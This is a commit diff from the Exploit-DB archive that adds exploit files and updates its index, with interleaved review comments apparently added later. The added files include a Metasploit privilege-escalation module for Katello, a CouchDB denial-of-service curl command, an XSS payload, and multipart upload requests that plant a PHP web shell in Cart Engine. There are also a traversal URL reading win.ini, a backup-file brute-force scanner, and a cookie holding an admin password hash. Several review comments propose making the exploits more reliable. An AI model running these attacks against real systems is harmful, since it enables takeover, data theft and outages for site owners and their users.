Updated 03_27_2014

Offensive Security 2014-03-27 04:31:46 +00:00
parent 06a026f6dd
commit ee58fa916e
30 changed files with 2497 additions and 40 deletions


@ -21086,7 +21086,7 @@ id,file,description,date,author,platform,type,port
23898,platforms/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0
23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 Cross-Site Scripting Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0
23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow Vulnerability",2004-03-31,"Shaun Colley",hardware,dos,0
23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0
23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0
23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0
23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability",2004-03-31,http-equiv,windows,remote,0
23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 Unauthorized Audio Stream Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0
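Review bot: the only change in this hunk is the description of 23901 gaining a " - " separator between product and title (the two 23901 rows in the middle of the hunk are the before and after). The surrounding rows 23898, 23900, 23902, 23903 and 23904 still use the separator-free form, so if the intent is to move files.csv to a "Product Version - Title" convention, those rows need the same treatment, otherwise this reads as a one-off edit with no stated reason.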
@ -29263,3 +29263,31 @@ id,file,description,date,author,platform,type,port
32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0
32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 'index.php' SQL Injection Vulnerability",2008-10-21,KnocKout,php,webapps,0
32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 'aspkat.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0
32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0
32502,platforms/php/webapps/32502.txt,"GetSimple CMS 3.3.1 - Persistent Cross Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0
32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0
32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0
32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0
32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0
32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0
32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0
32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80
32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443
32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80
32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
32518,platforms/windows/remote/32518.txt,"Google Chrome 0.2.149 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0
32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0
32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0
32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0
32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 'api.php' URI Redirection Vulnerability",2008-10-23,xuanmumu,php,webapps,0
32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 'announcements.php' SQL Injection Vulnerability",2008-10-23,xuanmumu,php,webapps,0
32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 'liste' Parameter Cross Site Scripting Vulnerability",2008-10-23,"Omer Singer",php,webapps,0
32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0
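Review bot: the port column is inconsistent across the new rows: 32511 and 32516 are webapps entries carrying 80, while the other webapps rows added here (32502 through 32510, 32520) carry 0; 32515 carries 443, which at least matches the Opt::RPORT(443) default in the module below. Pick one convention for webapps rows. Two metadata mismatches with the files in this same commit: the author of 32519 is "Krusty Hack" here but "KrustyHack" in the exploit header, and 32502 is dated 2014-03-25 here but 24-03-2014 in its own header. Finally, 32501 (MIFARE Classic, a contactless smartcard) is filed as platform multiple / type local, while the earlier row 23900 uses the hardware platform for comparable material.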

platforms/linux/remote/32515.rb Executable file

@ -0,0 +1,147 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization',
'Description' => %q{
This module exploits a missing authorization vulnerability in the
"update_roles" action of "users" controller of Katello and Red Hat Satellite
(Katello 1.5.0-14 and earlier) by changing the specified account to an
administrator account.
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2143'],
['CWE', '862']
],
'DisclosureDate' => 'Mar 24 2014'
)
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Your username']),
OptString.new('PASSWORD', [true, 'Your password']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
], self.class
)
end
def run
print_status("Logging into #{target_url}...")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'user_session', 'new'),
'vars_get' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Authentication failed')
return
else
session = $1 if res.get_cookies =~ /_katello_session=(\S*);/
if session.nil?
print_error('Failed to retrieve the current session')
return
end
end
print_status('Retrieving the CSRF token for this session...')
res = send_request_cgi(
'cookie' => "_katello_session=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'dashboard')
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Authentication failed')
return
else
session = $1 if res.get_cookies =~ /_katello_session=(\S*);/
if session.nil?
print_error('Failed to retrieve the current session')
return
end
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Failed to retrieve the user id')
return
else
csrf_token = $1 if res.body =~ /<meta[ ]+content="(\S*)"[ ]+name="csrf-token"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(\S*)"[ ]*\/?>/i if csrf_token.nil?
if csrf_token.nil?
print_error('Failed to retrieve the CSRF token')
return
end
user = $1 if res.body =~ /\/users.(\d+)#list_search=#{datastore['USERNAME']}/
if user.nil?
print_error('Failed to retrieve the user id')
return
end
end
print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...")
res = send_request_cgi(
'cookie' => "_katello_session=#{session}",
'headers' => {
'X-CSRF-Token' => csrf_token
},
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'),
'vars_post' => {
'user[role_ids][]' => '1'
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['X-Message-Type'] =~ /success$/
print_good('User updated successfully')
else
print_error('Failed to update user')
end
end
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
end
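Review bot: the third `if res.headers['Location'] =~ /user_session\/new$/` test (the one reporting "Failed to retrieve the user id") can never take its failure branch, because the identical test on the same `res` a few lines earlier has already returned on a match; drop the duplicated condition and keep the CSRF-token and user-id extraction at top level. Two correctness points follow: `datastore['USERNAME']` is interpolated unescaped into the user-id regex, so a username containing regex metacharacters (a dot, for instance) breaks or loosens the match, which `Regexp.escape` would fix; and the login request sends `username` and `password` as `vars_get`, placing the operator's password in the query string and therefore in the web-server and proxy access logs of the host it is run against, where a `vars_post` login would not. Minor: the download URL in the header comment reads `http//metasploit.com/download` (missing colon).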


@ -0,0 +1,16 @@
# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0
HOW TO
======
curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999
TEST
====
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.
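Review bot: the header gives no CVE and states the affected range as "up to 1.5.0", while files.csv describes the entry as "Couchdb 1.5.0"; state the range once, consistently. The "Tested on" line repeats that same range instead of naming the build and OS actually used, which is what a reader needs to reproduce the 30-second figure, and the Vendor Homepage and Software Link are the same URL, so the second should point at the download or be dropped. The author spelling also differs from files.csv ("KrustyHack" vs "Krusty Hack").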


@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/31853/info
MIFARE Classic is prone to multiple security weaknesses:
1. A security weakness may allow attackers to recover the internal state of the linear feedback shift register.
2. A security weakness may allow attackers to recover the previous state of the linear feedback shift register.
3. A security weakness may allow attackers to invert the filter function and potentially gain access to the private key.
4. A security weakness may allow attackers to reduce the search space for tag nonces.
Exploiting these issues in combination may allow attackers to gain access to the smartcard's secret key. Successful exploits will allow attackers with physical access to an RFID reader to bypass certain physical security restrictions.
http://www.exploit-db.com/sploits/32501.tgz
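Review bot: the four numbered items are the SecurityFocus summary and the substance lives in the linked tgz, so this text should say what the archive contains (paper, code, or both) and carry an author line; files.csv credits "Flavio D. Garcia" but nothing here does. The four weaknesses are also listed without the versions or card types they apply to, which the BID source and the archive presumably give.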

platforms/php/webapps/32502.txt Executable file

@ -0,0 +1,56 @@
# Exploit Title: etSimple CMS v3.3.1 Persistent Cross Site Scripting
# Google Dork: N/A
# Date: 24-03-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://get-simple.info/
# Software Link: http://get-simple.info/download/
# Version: v3.3.1
# Tested on: N/A
# CVE : N/A
#
## Description:
#
# In the administrative interface, the users can change their personal
settings. The parameters "name" and
# "permalink" do not properly sanitize its input and allows malicious code
to be stored in the XML file.
#
## PoC:
# Admin"><script>alert("1");</script>
# http://url/admin/settings.php
#
#
# The following parameters are vulnerable:
#
# 1. Permalink
# 2. Name
#
#
# More information can be found at:
http://www.nerdbox.it/getsimple-cms-v3-3-1-vulnerabilities/
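Review bot: the title line reads "etSimple CMS v3.3.1" (the leading G is missing) and the date is written 24-03-2014 where files.csv has 2014-03-25; both should match the CSV row. Three lines that wrap mid-sentence ("settings. The parameters "name" and", "to be stored in the XML file." and the closing nerdbox.it URL) have lost their leading "# ", so the file is no longer uniformly commented; re-wrap them. The PoC section gives one payload and one path but does not say which of the two listed parameters it was submitted through, so one line per parameter would make the two cases reproducible separately.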

platforms/php/webapps/32503.txt Executable file

@ -0,0 +1,350 @@
?
Cart Engine 3.0.0 Remote Code Execution
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 3.0.0
Summary: Open your own online shop today with Cart Engine! The
small, yet powerful and don't forget, FREE shopping cart based
on PHP & MySQL. Unique features of Cart Engine include: CMS engine
based on our qEngine, product options, custom fields, digital
products, search engine friendly URL, user friendly administration
control panel, easy to use custom fields, module expandable, sub
products, unsurpassed flexibility...and more!
Desc: Cart Engine suffers from an authenticated arbitrary code
execution. The vulnerability is caused due to the improper verification
of uploaded files in several modules thru several POST parameters.
This can be exploited to execute arbitrary PHP code by uploading
a malicious PHP script file that will be stored in '/public/image'
directory. Minimum permissions needed for a user to upload any file:
User level: Regular (param: user_level=1)
Admin level: Editor (param: admin_level=3)
Only the 'Super Admin' level makes the Tool 'File Manager' available.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5182
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5182.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
#1 (Modules > qBanner > Manage Banner > Add Entry)
POST http://localhost/ce3_0/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1
-----------------------------225222869427624
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------225222869427624
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------225222869427624
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------225222869427624
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------225222869427624
Content-Disposition: form-data; name="group_id"
QBANR
-----------------------------225222869427624
Content-Disposition: form-data; name="page_body"
This page is part of qBanner module. Please use qBanner Manager to edit this page.
-----------------------------225222869427624
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------225222869427624
Content-Disposition: form-data; name="page_list"
-----------------------------225222869427624--
Upload location: http://localhost/ce3_0/public/image/
Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami
#2 (Tools > File Manager > Upload)
POST http://localhost/ce3_0/admin/fman/upload_process.php HTTP/1.1
-----------------------------76802486520945
Content-Disposition: form-data; name="chdir"
-----------------------------76802486520945
Content-Disposition: form-data; name="n"
5
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_1"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_2"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_3"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_4"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_5"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945--
Upload location: Anywhere within the webroot folder and its subfolders.
Exec: http://localhost/ce3_0/shell.php?cmd=whoami
#3 (Modules > Slideshow > Manage Slides > Add Entry)
POST http://localhost/ce3_0/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1
-----------------------------23201806221528
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------23201806221528
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------23201806221528
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------23201806221528
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------23201806221528
Content-Disposition: form-data; name="group_id"
SSHOW
-----------------------------23201806221528
Content-Disposition: form-data; name="page_body"
This page is part of SlideShow module. Please use SlideShow Manager to edit this page.
-----------------------------23201806221528
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------23201806221528
Content-Disposition: form-data; name="page_list"
-----------------------------23201806221528--
Upload location: http://localhost/ce3_0/public/image/
Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami
#4 (Contents > Manage Categories > Add Entry)
POST http://localhost/ce3_0/admin/page_cat.php? HTTP/1.1
-----------------------------205172563220150
Content-Disposition: form-data; name="AXSRF_token"
3afa0c7483889ac54d7b6afa4083a9a2
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_key"
idx
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------205172563220150
Content-Disposition: form-data; name="group_id"
GENPG
-----------------------------205172563220150
Content-Disposition: form-data; name="parent_id"
1
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_name"
ZSL
-----------------------------205172563220150
Content-Disposition: form-data; name="permalink"
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_details"
<p>Zero Science Lab</p>
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------205172563220150--
Upload location: http://localhost/ce3_0/public/image/
Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami
#5 (Products > Category > Add Entry)
POST http://localhost/ce3_0/admin/product_cat.php? HTTP/1.1
-----------------------------137423069119287
Content-Disposition: form-data; name="AXSRF_token"
c3d8ccc82a75bb49d7698b6ed27fd016
-----------------------------137423069119287
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------137423069119287
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------137423069119287
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------137423069119287
Content-Disposition: form-data; name="primary_key"
idx
-----------------------------137423069119287
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------137423069119287
Content-Disposition: form-data; name="parent_id"
1
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_name"
ZSL
-----------------------------137423069119287
Content-Disposition: form-data; name="permalink"
zsl
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_details"
<p>CategoryDesc</p>
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_keywords"
Zero Science Lab
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_featured"
-----------------------------137423069119287--
Upload location: http://localhost/ce3_0/public/image/
Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami
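Review bot: the file opens with a stray "?" (most likely a UTF-8 BOM rendered as a literal character), which should be stripped. The "Minimum permissions needed" paragraph states a single user level and admin level for all five vectors, but the very next sentence says only Super Admin can reach File Manager, which is vector #2; label each numbered vector with the level it actually requires so a reader can judge exposure per role. The trailing "07.03.2014" is evidently the discovery date rather than the 2014-03-25 publication date in files.csv, and should say so. Since four of the five requests land in /public/image/ and the advisory offers no fix guidance, a remediation line (server-side validation of uploaded file types and no script execution under /public/image) would be worth adding.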

platforms/php/webapps/32504.txt Executable file

@ -0,0 +1,49 @@
?
Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 3.0.0
Summary: Open your own online shop today with Cart Engine! The
small, yet powerful and don't forget, FREE shopping cart based
on PHP & MySQL. Unique features of Cart Engine include: CMS engine
based on our qEngine, product options, custom fields, digital
products, search engine friendly URL, user friendly administration
control panel, easy to use custom fields, module expandable, sub
products, unsurpassed flexibility...and more!
Desc: Cart Engine suffers from an authenticated file inclusion
vulnerability (LFI) when input passed thru the 'run' parameter to
task.php is not properly verified before being used to include files.
This can be exploited to include files from local resources with
directory traversal attacks.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5181
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5181.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
http://localhost/ce3_0/admin/task.php?run=../../../../../../windows/win.ini
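Review bot: this file also opens with a stray "?" that should be removed. The description says the inclusion is authenticated, but unlike the companion RCE advisory (ZSL-2014-5182) it does not say which admin level is needed to reach task.php; add that, since it determines how many accounts can trigger the issue. The same date ambiguity applies: "07.03.2014" versus 2014-03-25 in files.csv.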

platforms/php/webapps/32505.txt Executable file

@ -0,0 +1,179 @@
?<?php
/*
Cart Engine 3.0.0 Database Backup Disclosure Exploit
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 3.0.0
Summary: Open your own online shop today with Cart Engine! The
small, yet powerful and don't forget, FREE shopping cart based
on PHP & MySQL. Unique features of Cart Engine include: CMS engine
based on our qEngine, product options, custom fields, digital
products, search engine friendly URL, user friendly administration
control panel, easy to use custom fields, module expandable, sub
products, unsurpassed flexibility...and more!
Desc: Cart Engine stores database backups using the Backup DB tool
with a predictable file name inside the '/admin/backup' directory
as 'Full Backup YYYYMMDD.sql' or 'Full Backup YYYYMMDD.gz', which
can be exploited to disclose sensitive information by downloading
the file. The '/admin/backup' is also vulnerable to directory listing
by default.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5180
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5180.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
*/
error_reporting(0);
function status($done, $total, $size=20)
{
static $start_time;
if($done > $total) return;
if(empty($start_time)) $start_time=time();
$now = time();
$perc=(double)($done/$total);
$bar=floor($perc*$size);
$disp=number_format($perc*100, 0);
$status_bar="\r $disp% [";
$status_bar.=str_repeat("=", $bar);
if($bar<$size)
{
$status_bar.=">";
$status_bar.=str_repeat(" ", $size-$bar);
} else
{
$status_bar.="=";
}
$status_bar.="] $done/$total";
$rate = ($now-$start_time)/$done;
$left = $total - $done;
$eta = round($rate * $left, 2);
$elapsed = $now - $start_time;
$status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec.";
echo "$status_bar ";
flush();
if($done == $total)
{
echo "\n";
}
}
print "
@---------------------------------------------------------------@
| |
| Cart Engine 3.0.0 Database Backup Disclosure Exploit |
| |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
| Advisory ID: ZSL-2014-5180 |
| www.zeroscience.mk |
| |
@---------------------------------------------------------------@
";
if ($argc < 4)
{
print "\n\n [+] Usage: php $argv[0] <host> <port> <dirname>\n\n";
print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n";
die();
}
$godina_array = array('2014','2013','2012','2011','2010');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$host = $argv[1];
$port = intval($argv[2]);
$path = $argv[3];
$dbnm = "Full%20Backup%20";
$alert1 = "\033[1;31m";
$alert2 = "\033[0;37m";
$alert3 = "\033[1;32m";
echo "\n [*] Running checks:\n\n";
foreach($godina_array as $godina)
{
foreach($mesec_array as $mesec)
{
$x++;
status($x, 58);
foreach($dn_array as $dn)
{
$ext=".gz";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
}
$ext=".sql";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
}
}
}
}
print "\n\n [*] Zero findings!\n\n\n";
?>
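Review bot: `$x++` at the top of the month loop increments a variable that is never initialised (the notice is hidden by `error_reporting(0)`); set `$x = 0` before the loops. The progress total is wrong as well: five years times twelve months is 60 iterations, not 58, and because `status()` returns early when `$done > $total`, the bar simply stops updating for the last two months. Existence is decided by `file_get_contents(...)` being truthy, which downloads the whole backup just to detect it and yields a false positive on any server that answers unknown paths with a 200 custom error page; checking the response status would be more reliable, and the day loop also tries dates that cannot exist (e.g. day 31 of month 02). The leading "?" before `<?php` is a stray byte (likely a BOM) and will be echoed before the banner whenever the script runs.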

platforms/php/webapps/32506.txt Executable file

@ -0,0 +1,53 @@
?
Kemana Directory 1.5.6 kemana_admin_passwd Cookie User Password Hash Disclosure
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana contains a flaw that is due to the 'kemana_admin_passwd'
cookie storing user password SHA1 hashes. This may allow a remote MitM
attacker to more easily gain access to password information.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5179
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5179.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
GET /kemana/admin/rev_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/kemana/admin/link.php
Cookie: qvc_value=4e520fb7e28ff76d71800f4329633bc12040101c; kemana_user_id=guest%2Acbb77d83775796bc42f94a97f9905a0d; kemana_admin_id=admin; kemana_admin_passwd=d033e22ae348aeb5660fc2140aec35850c4da997
Connection: keep-alive
